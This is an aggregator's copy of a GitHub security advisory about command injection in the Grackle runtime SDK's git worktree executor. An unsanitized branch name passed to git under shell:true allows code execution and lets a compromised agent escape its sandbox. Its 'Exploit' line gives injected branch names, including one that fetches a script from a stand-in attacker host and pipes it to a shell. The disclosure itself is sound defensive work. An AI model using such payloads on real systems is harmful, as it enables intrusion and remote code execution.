CSIRTS // UNIFIED SECURITY ADVISORY FEEDSYS ● ONLINE · POWERED BY INTELFUSIONS.COM

GHSA-vv65-f55v-xm6g: Grackle has command/argument injection in the git worktree executor that enables RCE on provisioned hosts via an unsanitized task branch name (shell:true)

high
Summary The default git executor used for all worktree operations spawns git through a shell, and the untrusted task branch name flows into the command unsanitized. A caller able to reach the PowerLine SpawnSession RPC (a malicious or compromised agent acting through the orchestration layer, or any client able to spawn a task) can achieve arbitrary command execution as the PowerLine user on every provisioned environment (SSH host, Docker container, or Codespace), escaping the agent sandbox. This advisory bundles two related defects in worktree.ts (audit findings F1 and F13). Affected versions @grackle-ai/runtime-sdk (and reachable via @grackle-ai/powerline) at version 0.132.1 and earlier. All publishable packages are lockstep-versioned. F1 — Command injection via shell:true (primary, High) Location: packages/runtime-sdk/src/worktree.ts:22-28 (sink), :135-143 (branch → args). Source: packages/powerline/src/grpc-server.ts:112 (req.branch), packages/runtime-sdk/src/base-session.ts:60,137. NODE_GIT_EXECUTOR.exec runs: const shell = process.env.SHELL || true; // worktree.ts:24 — always truthy const result = await execRaw("git", args, { ...options, shell }); When shell is truthy, Node does not pass args as a safe argv vector — it concatenates git + args into a single string run through sh -c with no escaping. The untrusted branch flows unvalidated from the SpawnSession gRPC request into: ["worktree", "add", "-b", branch, wtPath, startPoint] // worktree.ts:135-137 ["worktree", "add", wtPath, branch] // fallback :143 sanitizeBranch() (worktree.ts:50) is applied only to compute the on-disk worktree directory path — *not* to the -b <branch> argument — so it provides zero protection at the injection sink. Exploit: set a task branch to x;curl http://attacker/x.sh|sh;# or $(touch /tmp/pwned). ensureWorktree runs it under sh -c

Details

Source
GitHub Security Advisories (INTL · database · site)
Severity
high
Published
2026-07-02
Last updated
2026-07-02
Exploitation
Not in CISA KEV at last sync

Original advisory: https://github.com/advisories/GHSA-vv65-f55v-xm6g

More from GitHub Security Advisories